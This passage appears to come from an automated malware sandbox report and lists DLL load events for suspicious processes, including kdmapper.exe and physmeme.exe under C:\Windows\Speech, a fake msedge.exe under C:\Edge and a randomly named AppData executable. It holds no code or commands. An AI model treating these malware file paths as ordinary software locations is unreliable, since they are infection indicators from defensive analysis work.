                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: version.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ktmw32.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rasapi32.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rasman.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rtutils.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dlnashext.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wpdshext.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
